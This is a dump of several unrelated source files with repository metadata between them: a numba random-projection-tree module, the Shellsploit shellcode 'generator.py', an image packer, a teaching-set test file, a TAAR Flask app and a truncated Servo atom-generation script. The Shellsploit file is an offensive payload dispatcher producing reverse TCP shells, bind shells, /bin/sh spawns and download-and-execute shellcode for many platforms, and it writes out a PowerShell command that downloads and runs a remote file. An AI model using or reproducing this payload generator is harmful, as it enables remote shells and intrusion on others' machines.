left_indices,
right_indices,
hyperplane,
offset,
) = sparse_angular_random_projection_split(
inds, indptr, data, indices, rng_state
)
make_sparse_angular_tree(
inds,
indptr,
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_sparse_angular_tree(
inds,
indptr,
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([[-1.0], [-1.0]], dtype=np.float64))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
@numba.njit(nogil=True, cache=True)
def make_dense_tree(data, rng_state, leaf_size=30, angular=False):
indices = np.arange(data.shape[0]).astype(np.int32)
hyperplanes = numba.typed.List.empty_list(dense_hyperplane_type)
offsets = numba.typed.List.empty_list(offset_type)
children = numba.typed.List.empty_list(children_type)
point_indices = numba.typed.List.empty_list(point_indices_type)
if angular:
make_angular_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
else:
make_euclidean_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
# print("Completed a tree")
result = FlatTree(hyperplanes, offsets, children, point_indices, leaf_size)
# print("Tree type is:", numba.typeof(result))
return result
@numba.njit(nogil=True, cache=True)
def make_sparse_tree(inds, indptr, spdata, rng_state, leaf_size=30, angular=False):
indices = np.arange(indptr.shape[0] - 1).astype(np.int32)
hyperplanes = numba.typed.List.empty_list(sparse_hyperplane_type)
offsets = numba.typed.List.empty_list(offset_type)
children = numba.typed.List.empty_list(children_type)
point_indices = numba.typed.List.empty_list(point_indices_type)
if angular:
make_sparse_angular_tree(
inds,
indptr,
spdata,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
else:
make_sparse_euclidean_tree(
inds,
indptr,
spdata,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
return FlatTree(hyperplanes, offsets, children, point_indices, leaf_size)
@numba.njit(
[
"b1(f4[::1],f4,f4[::1],i8[::1])",
numba.types.boolean(
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.float32,
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.int64, 1, "C", readonly=False),
),
],
fastmath=True,
locals={
"margin": numba.types.float32,
"dim": numba.types.intp,
"d": numba.types.uint16,
},
cache=True,
)
def select_side(hyperplane, offset, point, rng_state):
margin = offset
dim = point.shape[0]
for d in range(dim):
margin += hyperplane[d] * point[d]
if abs(margin) < EPS:
side = np.abs(tau_rand_int(rng_state)) % 2
if side == 0:
return 0
else:
return 1
elif margin > 0:
return 0
else:
return 1
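# Worked example for select_side (hypothetical numbers): with
# hyperplane = [1.0, -1.0], offset = 0.0 and point = [3.0, 5.0], the margin is
# 0.0 + 1.0*3.0 + (-1.0)*5.0 = -2.0 < 0, so the point is routed to the right
# child (return value 1).  Near-zero margins (|margin| < EPS) are resolved by a
# coin flip drawn from rng_state, so points lying on the hyperplane spread over
# both children.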
@numba.njit(
[
"i4[::1](f4[::1],f4[:,::1],f4[::1],i4[:,::1],i4[::1],i8[::1])",
numba.types.Array(numba.types.int32, 1, "C", readonly=True)(
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.float32, 2, "C", readonly=True),
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.int32, 2, "C", readonly=True),
numba.types.Array(numba.types.int32, 1, "C", readonly=True),
numba.types.Array(numba.types.int64, 1, "C", readonly=False),
),
],
locals={"node": numba.types.uint32, "side": numba.types.boolean},
cache=True,
)
def search_flat_tree(point, hyperplanes, offsets, children, indices, rng_state):
node = 0
while children[node, 0] > 0:
side = select_side(hyperplanes[node], offsets[node], point, rng_state)
if side == 0:
node = children[node, 0]
else:
node = children[node, 1]
return indices[-children[node, 0] : -children[node, 1]]
@numba.njit(fastmath=True, cache=True)
def sparse_select_side(hyperplane, offset, point_inds, point_data, rng_state):
margin = offset
hyperplane_size = hyperplane.shape[1]
while hyperplane[0, hyperplane_size - 1] < 0.0:
hyperplane_size -= 1
hyperplane_inds = hyperplane[0, :hyperplane_size].astype(np.int32)
hyperplane_data = hyperplane[1, :hyperplane_size]
_, aux_data = sparse_mul(hyperplane_inds, hyperplane_data, point_inds, point_data)
for val in aux_data:
margin += val
if abs(margin) < EPS:
side = tau_rand_int(rng_state) % 2
if side == 0:
return 0
else:
return 1
elif margin > 0:
return 0
else:
return 1
@numba.njit(locals={"node": numba.types.uint32}, cache=True)
def search_sparse_flat_tree(
point_inds, point_data, hyperplanes, offsets, children, indices, rng_state
):
node = 0
while children[node, 0] > 0:
side = sparse_select_side(
hyperplanes[node], offsets[node], point_inds, point_data, rng_state
)
if side == 0:
node = children[node, 0]
else:
node = children[node, 1]
return indices[-children[node, 0] : -children[node, 1]]
def make_forest(
data,
n_neighbors,
n_trees,
leaf_size,
rng_state,
random_state,
n_jobs=None,
angular=False,
):
"""Build a random projection forest with ``n_trees``.
Parameters
----------
data
n_neighbors
n_trees
leaf_size
rng_state
angular
Returns
-------
forest: list
A list of random projection trees.
"""
# print(ts(), "Started forest construction")
result = []
if leaf_size is None:
leaf_size = max(10, n_neighbors)
if n_jobs is None:
n_jobs = -1
rng_states = random_state.randint(INT32_MIN, INT32_MAX, size=(n_trees, 3)).astype(
np.int64
)
try:
if scipy.sparse.isspmatrix_csr(data):
result = joblib.Parallel(n_jobs=n_jobs, require="sharedmem")(
joblib.delayed(make_sparse_tree)(
data.indices,
data.indptr,
data.data,
rng_states[i],
leaf_size,
angular,
)
for i in range(n_trees)
)
else:
result = joblib.Parallel(n_jobs=n_jobs, require="sharedmem")(
joblib.delayed(make_dense_tree)(data, rng_states[i], leaf_size, angular)
for i in range(n_trees)
)
except (RuntimeError, RecursionError, SystemError):
warn(
"Random Projection forest initialisation failed due to recursion"
"limit being reached. Something is a little strange with your "
"graph_data, and this may take longer than normal to compute."
)
return tuple(result)
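# Minimal usage sketch (values are illustrative, not taken from the library's
# tests):
#
#     random_state = np.random.RandomState(42)
#     rng_state = random_state.randint(INT32_MIN, INT32_MAX, 3).astype(np.int64)
#     forest = make_forest(data, n_neighbors=15, n_trees=8, leaf_size=None,
#                          rng_state=rng_state, random_state=random_state)
#     leaf_array = rptree_leaf_array(forest)  # per-leaf point indices, padded with -1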
@numba.njit(nogil=True, cache=True)
def get_leaves_from_tree(tree):
n_leaves = 0
for i in range(len(tree.children)):
if tree.children[i][0] == -1 and tree.children[i][1] == -1:
n_leaves += 1
result = np.full((n_leaves, tree.leaf_size), -1, dtype=np.int32)
leaf_index = 0
for i in range(len(tree.indices)):
if tree.children[i][0] == -1 or tree.children[i][1] == -1:
leaf_size = tree.indices[i].shape[0]
result[leaf_index, :leaf_size] = tree.indices[i]
leaf_index += 1
return result
def rptree_leaf_array_parallel(rp_forest):
result = joblib.Parallel(n_jobs=-1, require="sharedmem")(
joblib.delayed(get_leaves_from_tree)(rp_tree) for rp_tree in rp_forest
)
return result
def rptree_leaf_array(rp_forest):
if len(rp_forest) > 0:
return np.vstack(rptree_leaf_array_parallel(rp_forest))
else:
return np.array([[-1]])
@numba.njit()
def recursive_convert(
tree, hyperplanes, offsets, children, indices, node_num, leaf_start, tree_node
):
if tree.children[tree_node][0] < 0:
leaf_end = leaf_start + len(tree.indices[tree_node])
children[node_num, 0] = -leaf_start
children[node_num, 1] = -leaf_end
indices[leaf_start:leaf_end] = tree.indices[tree_node]
return node_num, leaf_end
else:
hyperplanes[node_num] = tree.hyperplanes[tree_node]
offsets[node_num] = tree.offsets[tree_node]
children[node_num, 0] = node_num + 1
old_node_num = node_num
node_num, leaf_start = recursive_convert(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][0],
)
children[old_node_num, 1] = node_num + 1
node_num, leaf_start = recursive_convert(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][1],
)
return node_num, leaf_start
@numba.njit()
def recursive_convert_sparse(
tree, hyperplanes, offsets, children, indices, node_num, leaf_start, tree_node
):
if tree.children[tree_node][0] < 0:
leaf_end = leaf_start + len(tree.indices[tree_node])
children[node_num, 0] = -leaf_start
children[node_num, 1] = -leaf_end
indices[leaf_start:leaf_end] = tree.indices[tree_node]
return node_num, leaf_end
else:
hyperplanes[
node_num, :, : tree.hyperplanes[tree_node].shape[1]
] = tree.hyperplanes[tree_node]
offsets[node_num] = tree.offsets[tree_node]
children[node_num, 0] = node_num + 1
old_node_num = node_num
node_num, leaf_start = recursive_convert_sparse(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][0],
)
children[old_node_num, 1] = node_num + 1
node_num, leaf_start = recursive_convert_sparse(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][1],
)
return node_num, leaf_start
@numba.njit(cache=True)
def num_nodes_and_leaves(tree):
n_nodes = 0
n_leaves = 0
for i in range(len(tree.children)):
if tree.children[i][0] < 0:
n_leaves += 1
n_nodes += 1
else:
n_nodes += 1
return n_nodes, n_leaves
@numba.njit(cache=True)
def dense_hyperplane_dim(hyperplanes):
for i in range(len(hyperplanes)):
if hyperplanes[i].shape[0] > 1:
return hyperplanes[i].shape[0]
raise ValueError("No hyperplanes of adequate size were found!")
@numba.njit(cache=True)
def sparse_hyperplane_dim(hyperplanes):
max_dim = 0
for i in range(len(hyperplanes)):
if hyperplanes[i].shape[1] > max_dim:
max_dim = hyperplanes[i].shape[1]
return max_dim
def convert_tree_format(tree, data_size):
n_nodes, n_leaves = num_nodes_and_leaves(tree)
is_sparse = False
if tree.hyperplanes[0].ndim == 1:
# dense hyperplanes
hyperplane_dim = dense_hyperplane_dim(tree.hyperplanes)
hyperplanes = np.zeros((n_nodes, hyperplane_dim), dtype=np.float32)
else:
# sparse hyperplanes
is_sparse = True
hyperplane_dim = sparse_hyperplane_dim(tree.hyperplanes)
hyperplanes = np.zeros((n_nodes, 2, hyperplane_dim), dtype=np.float32)
hyperplanes[:, 0, :] = -1
offsets = np.zeros(n_nodes, dtype=np.float32)
children = np.int32(-1) * np.ones((n_nodes, 2), dtype=np.int32)
indices = np.int32(-1) * np.ones(data_size, dtype=np.int32)
if is_sparse:
recursive_convert_sparse(
tree, hyperplanes, offsets, children, indices, 0, 0, len(tree.children) - 1
)
else:
recursive_convert(
tree, hyperplanes, offsets, children, indices, 0, 0, len(tree.children) - 1
)
return FlatTree(hyperplanes, offsets, children, indices, tree.leaf_size)
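# After conversion, an internal node has children[i, 0] > 0 (the index of its
# left child), while a leaf is encoded with non-positive entries so that
# indices[-children[i, 0]:-children[i, 1]] yields the points stored in that
# leaf; this is the layout that search_flat_tree and search_sparse_flat_tree
# traverse.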
# Indices for tuple version of flat tree for pickle serialization
FLAT_TREE_HYPERPLANES = 0
FLAT_TREE_OFFSETS = 1
FLAT_TREE_CHILDREN = 2
FLAT_TREE_INDICES = 3
FLAT_TREE_LEAF_SIZE = 4
def denumbaify_tree(tree):
result = (
tree.hyperplanes,
tree.offsets,
tree.children,
tree.indices,
tree.leaf_size,
)
return result
def renumbaify_tree(tree):
result = FlatTree(
tree[FLAT_TREE_HYPERPLANES],
tree[FLAT_TREE_OFFSETS],
tree[FLAT_TREE_CHILDREN],
tree[FLAT_TREE_INDICES],
tree[FLAT_TREE_LEAF_SIZE],
)
return result
@numba.njit(
parallel=True,
locals={
"intersection": numba.int64[::1],
"result": numba.float32,
"i": numba.uint32,
},
cache=True,
)
def score_tree(tree, neighbor_indices, data, rng_state):
result = 0.0
for i in numba.prange(neighbor_indices.shape[0]):
leaf_indices = search_flat_tree(
data[i],
tree.hyperplanes,
tree.offsets,
tree.children,
tree.indices,
rng_state,
)
intersection = arr_intersect(neighbor_indices[i], leaf_indices)
result += numba.float32(intersection.shape[0] > 1)
return result / numba.float32(neighbor_indices.shape[0])
@numba.njit(nogil=True, parallel=True, locals={"node": numba.int32}, cache=True)
def score_linked_tree(tree, neighbor_indices):
result = 0.0
n_nodes = len(tree.children)
for i in numba.prange(n_nodes):
node = numba.int32(i)
left_child = tree.children[node][0]
right_child = tree.children[node][1]
if left_child == -1 and right_child == -1:
for j in range(tree.indices[node].shape[0]):
idx = tree.indices[node][j]
intersection = arr_intersect(neighbor_indices[idx], tree.indices[node])
result += numba.float32(intersection.shape[0] > 1)
return result / numba.float32(neighbor_indices.shape[0])
| bsd-2-clause | 7,960,273,991,405,806,000 | 29.507154 | 90 | 0.584736 | false |
m3pt0r/l0l | core/database/generator.py | 2 | 10276 | #------------------Bombermans Team---------------------------------#
#Author : B3mB4m
#Concat : [email protected]
#Project : https://github.com/b3mb4m/Shellsploit
#LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
def generator( choose, shellcode, argv="None", argv2="None"):
if choose == "linux_x86":
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
return bin_shx86()
elif shellcode == "exec":
from Linux86.execc import execc
return execc( argv)
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from stackconvert import stackconvertSTR
return readx86( stackconvertSTR(argv))
elif shellcode == "download&exec":
from Linux86.download import downloadANDexecute
from stackconvert import stackconvertSTR
filename = argv.split("/")[-1]
return downloadANDexecute( stackconvertSTR(argv), stackconvertSTR(filename))
elif shellcode == "chmod":
from Linux86.chmod import ch
from stackconvert import stackconvertSTR
return ch( stackconvertSTR(argv))
elif shellcode == "tcp_bind":
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
return tcp_bindx86( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx86( IP(argv), PORT(argv2))
elif shellcode == "cd_eject":
from Linux86.cd_eject import cd_eject
return cd_eject()
elif choose == "linux_x64":
if shellcode == "bin_sh":
from Linux64.bin_shx64 import bin_shx64
return bin_shx64()
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from stackconvert import PORT
return tcp_bindx64( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "read":
from Linux64.readfilex64 import readx64
from stackconvert import plaintext
return readx64( plaintext(argv))
elif choose == "linux":
from Linux.magic import merlin
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
from Linux64.bin_shx64 import bin_shx64
value = hex(len(bin_shx86().split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+bin_shx86()+bin_shx64()
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from Linux64.readfilex64 import readx64
from stackconvert import stackconvertSTR
from stackconvert import plaintext
value = hex(len(readx86( stackconvertSTR(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+readx86( stackconvertSTR(argv))+readx64( plaintext(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
value = hex(len(reverse_tcpx86( IP(argv), PORT(argv2)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+reverse_tcpx86( IP(argv), PORT(argv2))+reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
value = hex(len(tcp_bindx86( PORT(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+tcp_bindx86( PORT(argv))+tcp_bindx64( PORT(argv))
elif choose == "osx86":
if shellcode == "tcp_bind":
from OSX86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif shellcode == "bin_sh":
from OSX86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "osx64":
if shellcode == "bin_sh":
from OSX64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from OSX64.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "freebsd_x86":
if shellcode == "bin_sh":
from FreeBSDx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "read":
from FreeBSDx86.read import read
from stackconvert import plaintext
return read(plaintext(argv))
elif shellcode == "reverse_tcp":
from FreeBSDx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif shellcode == "reverse_tcp2":
from FreeBSDx86.reverse_tcp2 import reverse_tcp2
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp2( IP(argv2), PORT(argv))
elif shellcode == "tcp_bind":
from FreeBSDx86.tcp_bind import tcp_bind
			# Convert the decimal port number to two big-endian "\xHH" bytes.
			port_val = int(argv)
			PORT = "\\x{0:02x}\\x{1:02x}".format((port_val >> 8) & 0xff, port_val & 0xff)
return tcp_bind( PORT)
elif shellcode == "exec":
from FreeBSDx86.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
			return execc(plaintext(command))
elif choose == "freebsd_x64":
if shellcode == "bin_sh":
from FreeBSDx64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from FreeBSDx64.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
			return execc(plaintext(command))
elif shellcode == "tcp_bind":
from stackconvert import plaintext
from stackconvert import PORT
from FreeBSDx64.tcp_bind import tcp_bind
return tcp_bind( PORT(argv), plaintext(argv2))
elif shellcode == "reverse_tcp":
from FreeBSDx64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "linux_arm":
if shellcode == "chmod":
from LinuxARM.chmod import chmod
from stackconvert import plaintext
if argv == "None":
return "FILE PATH must be declared."
else:
return chmod( plaintext(argv))
elif shellcode == "bin_sh":
from LinuxARM.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from LinuxARM.execc import execc
return execc( argv)
elif shellcode == "reverse_tcp":
from LinuxARM.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif choose == "linux_mips":
if shellcode == "reverse_tcp":
from LinuxMIPS.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "bin_sh":
from LinuxMIPS.bin_sh import bin_sh
return bin_sh()
elif shellcode == "chmod":
from LinuxMIPS.chmod import chmod
from stackconvert import plaintext
return chmod( plaintext(argv))
elif shellcode == "tcp_bind":
from LinuxMIPS.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "windows":
if shellcode == "messagebox":
from Windows import messagebox
from stackconvert import stackconvertSTR
if argv == "None":
return messagebox.messagebox( False)
else:
return messagebox.messagebox( stackconvertSTR(argv, True))
elif shellcode == "downloadandexecute":
from Windows.downloadandexecute import downANDexecute
from stackconvert import rawSTR
from stackconvert import stackconvertSTR
if argv2 == "None":
argv2 = argv.split("/")[-1]
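            # With a hypothetical argv = "http://host/payload.exe" and argv2
            # left as "None", argv2 falls back to "payload.exe" and the command
            # passed to the payload becomes:
            #   powershell -command "& { (New-Object Net.WebClient).DownloadFile(
            #     'http://host/payload.exe', 'payload.exe') ;(New-Object -com
            #     Shell.Application).ShellExecute('payload.exe');}"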
powershell = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s') ;(New-Object -com Shell.Application).ShellExecute('%s');}"''' % (argv, argv2, argv2)
return downANDexecute(payload=stackconvertSTR(powershell))
elif shellcode == "exec":
from Windows.execc import WinExec
return WinExec(argv)
elif shellcode == "tcp_bind":
from Windows.bind_tcp import PayloadModule
return PayloadModule( argv).gen_shellcode()
elif shellcode == "reverse_tcp":
from Windows.rev_tcp import PayloadModule
return PayloadModule( argv, argv2).gen_shellcode()
elif choose == "solarisx86":
if shellcode == "read":
from Solarisx86.read import read
from stackconvert import plaintext
return read( plaintext(argv))
elif shellcode == "reverse_tcp":
from Solarisx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
            return reverse_tcp(host=IP(argv), port=PORT(argv2))
elif shellcode == "bin_sh":
from Solarisx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "tcp_bind":
from Solarisx86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
| mit | -3,363,724,911,885,896,700 | 33.253333 | 201 | 0.632542 | false |
MM56/Magipack.js | examples/packImages.py | 1 | 1413 | #!/usr/bin/env python
import os, sys, getopt
import re
import json
def listFiles(path):
if not path.endswith('/'): path += '/'
files = os.listdir(path)
arr = []
for f in files:
if f.lower().endswith(('.png', '.jpg', '.jpeg', '.gif', '.webp')):
arr.append([path + f, f])
if os.path.isdir(path + '/' + f):
arr.extend(listFiles(path + f + '/'))
return arr
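# listFiles returns [full path, bare filename] pairs, for example
# (illustrative): [['assets/ui/logo.png', 'logo.png'], ['assets/bg.jpg', 'bg.jpg']]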
def packImages(files, dest, path, filename):
    output = b''
    data = []
    offset = 0
    for full_path, name in files:
        # Read each image as raw bytes so the pack stays binary-safe.
        with open(full_path, 'rb') as img:
            content = img.read()
        size = len(content)
        output += content
        # Derive the mime type from the real extension ('.jpeg' and '.webp'
        # included), instead of the last three characters of the filename.
        ext = os.path.splitext(name)[1].lower().lstrip('.')
        mimetype = 'image/' + ('jpeg' if ext in ('jpg', 'jpeg') else ext)
        # Each index entry is [relative path, start offset, end offset, mime type].
        data.append([full_path[len(path):], offset, offset + size, mimetype])
        offset += size
    with open(dest + filename + '.pack', 'wb') as pack_file:
        pack_file.write(output)
    with open(dest + filename + '.json', 'w') as index_file:
        index_file.write(json.dumps(data))
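# The companion .json index records where each image lives inside the .pack
# blob; for two packed files it would look like (offsets illustrative):
#   [["ui/logo.png", 0, 5321, "image/png"], ["bg.jpg", 5321, 9844, "image/jpeg"]]
# so a loader can fetch <filename>.pack once and slice each image out by its
# [start, end) byte range. A typical (assumed) invocation of this script:
#   python packImages.py -p assets/ -o build/ -n images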
def main():
    path = dest = "."
    filename = "images"  # fallback pack name when -n is not supplied
    try:
        myopts, args = getopt.getopt(sys.argv[1:], "p:o:n:")
    except getopt.GetoptError as e:
        print(str(e))
        print("Usage: %s -p <path> -o <output> -n <filename>" % sys.argv[0])
        sys.exit(2)
    for o, a in myopts:
        if o == '-p':
            path = a
        elif o == '-o':
            dest = a
        elif o == '-n':
            filename = a
    if path and not path.endswith('/'):
        path += '/'
    if dest and not dest.endswith('/'):
        dest += '/'
    packImages(listFiles(path), dest, path, filename)
if __name__ == "__main__":
main() | mit | -648,486,166,919,818,800 | 21.09375 | 70 | 0.550602 | false |
aravart/capomate | poolmate/test/test_api.py | 2 | 1786 | import numpy as np
import StringIO
from poolmate.teach import Runner, SVMLearner, build_options
from sklearn.datasets import make_classification
# TODO: Unneeded?
class ScikitTextLearner:
def __init__(self, scikit_learner):
self.scikit_learner = scikit_learner
def fit(self, yx):
pass
def loss(self, model):
pass
def make_example():
x, y = make_classification(n_samples=100,
n_features=20,
n_informative=2,
n_redundant=2,
n_clusters_per_class=2,
flip_y=0.01)
z = np.concatenate((np.reshape(y, (len(y), 1)), x), axis=1)
return z
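# Each row of z is [label, feature_0, ..., feature_19]: column 0 carries y and
# the remaining 20 columns carry the features, the layout SVMLearner is assumed
# to expect.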
def test_numpy_python_api():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
options = build_options(search_budget=10,
teaching_set_size=2)
best_loss, best_set = runner.run_experiment(z, learner, options)
def test_text_python_api():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
options = build_options(search_budget=10,
teaching_set_size=2)
best_loss, best_set = runner.run_experiment(z, learner, options)
def test_log_stream():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
log = StringIO.StringIO()
options = build_options(search_budget=10,
teaching_set_size=2,
log=log)
best_loss, best_set = runner.run_experiment(z, learner, options)
print best_set, best_loss
# is this exactly like other api?
# no this wrapper isn't taking indices
# can we output and plot performance?
# what about doing it for text?
# document
| mit | 5,406,317,989,885,995,000 | 28.278689 | 68 | 0.577828 | false |
maurodoglio/taar | taar/flask_app.py | 1 | 2518 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
from flask import Flask
from dockerflow.flask import Dockerflow
import optparse
from decouple import config
import importlib
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
app = Flask(__name__)
dockerflow = Dockerflow(app)
# Hook the application plugin and configure it
PLUGIN = config("TAAR_API_PLUGIN", default=None)
sentry_sdk.init(
dsn=config("SENTRY_DSN", ''),
integrations=[FlaskIntegration()],
)
# There should only be a single registered app for the taar-api
if PLUGIN is None:
sys.stderr.write("No plugin is defined.\n")
sys.exit(1)
# Load the function and configure the application
sys.stdout.write("Loading [{}]\n".format(PLUGIN))
plugin_module = importlib.import_module(PLUGIN)
configure_plugin = importlib.import_module(PLUGIN).configure_plugin
APP_WRAPPER = configure_plugin(app)
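# A plugin module named by TAAR_API_PLUGIN is expected to expose a
# configure_plugin(app) callable that registers its routes on the Flask app;
# its return value is kept in APP_WRAPPER. A minimal, purely illustrative
# plugin could look like:
#
#     def configure_plugin(app):
#         @app.route("/v1/ping")
#         def ping():
#             return "pong"
#         return app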
def flaskrun(app, default_host="127.0.0.1", default_port="8000"):
"""
Takes a flask.Flask instance and runs it. Parses
command-line flags to configure the app.
"""
# Set up the command-line options
parser = optparse.OptionParser()
parser.add_option(
"-H",
"--host",
help="Hostname of the Flask app " + "[default %s]" % default_host,
default=default_host,
)
parser.add_option(
"-P",
"--port",
help="Port for the Flask app " + "[default %s]" % default_port,
default=default_port,
)
# Two options useful for debugging purposes, but
# a bit dangerous so not exposed in the help message.
parser.add_option(
"-d", "--debug", action="store_true", dest="debug", help=optparse.SUPPRESS_HELP
)
parser.add_option(
"-p",
"--profile",
action="store_true",
dest="profile",
help=optparse.SUPPRESS_HELP,
)
options, _ = parser.parse_args()
# If the user selects the profiling option, then we need
# to do a little extra setup
if options.profile:
from werkzeug.contrib.profiler import ProfilerMiddleware
app.config["PROFILE"] = True
app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[30])
options.debug = True
app.run(debug=options.debug, host=options.host, port=int(options.port))
if __name__ == "__main__":
flaskrun(app)
| mpl-2.0 | 4,864,298,516,271,165,000 | 26.977778 | 87 | 0.664019 | false |
birryree/servo | components/style/binding_tools/regen_atoms.py | 6 | 7054 | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import re
import os
PRELUDE = """
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
/* Autogenerated file, DO NOT EDIT DIRECTLY */
"""[1:]
def gnu_symbolify(source, ident):
return "_ZN{}{}{}{}E".format(len(source.CLASS), source.CLASS, len(ident), ident)
def msvc64_symbolify(source, ident):
return "?{}@{}@@2PEAV{}@@EA".format(ident, source.CLASS, source.TYPE)
def msvc32_symbolify(source, ident):
# Prepend "\x01" to avoid LLVM prefixing the mangled name with "_".
# See https://github.com/rust-lang/rust/issues/36097
return "\\x01?{}@{}@@2PAV{}@@A".format(ident, source.CLASS, source.TYPE)
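# For example, with the GkAtomSource defined below, the ident "a" mangles to:
#   gnu_symbolify    -> "_ZN9nsGkAtoms1aE"
#   msvc64_symbolify -> "?a@nsGkAtoms@@2PEAVnsIAtom@@EA"
#   msvc32_symbolify -> "\x01?a@nsGkAtoms@@2PAVnsIAtom@@A"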
class GkAtomSource:
PATTERN = re.compile('^GK_ATOM\((?P<ident>.+),\s*"(?P<value>.*)"\)', re.M)
FILE = "dist/include/nsGkAtomList.h"
CLASS = "nsGkAtoms"
TYPE = "nsIAtom"
class CSSPseudoElementsAtomSource:
PATTERN = re.compile('^CSS_PSEUDO_ELEMENT\((?P<ident>.+),\s*"(?P<value>.*)",', re.M)
FILE = "dist/include/nsCSSPseudoElementList.h"
CLASS = "nsCSSPseudoElements"
# NB: nsICSSPseudoElement is effectively the same as a nsIAtom, but we need
# this for MSVC name mangling.
TYPE = "nsICSSPseudoElement"
class CSSAnonBoxesAtomSource:
PATTERN = re.compile('^CSS_ANON_BOX\((?P<ident>.+),\s*"(?P<value>.*)"\)', re.M)
FILE = "dist/include/nsCSSAnonBoxList.h"
CLASS = "nsCSSAnonBoxes"
TYPE = "nsICSSAnonBoxPseudo"
class CSSPropsAtomSource:
PATTERN = re.compile('^CSS_PROP_[A-Z]+\(\s*(?P<value>[^,]+),\s*(?P<ident>[^,]+)', re.M)
FILE = "dist/include/nsCSSPropList.h"
CLASS = "nsCSSProps"
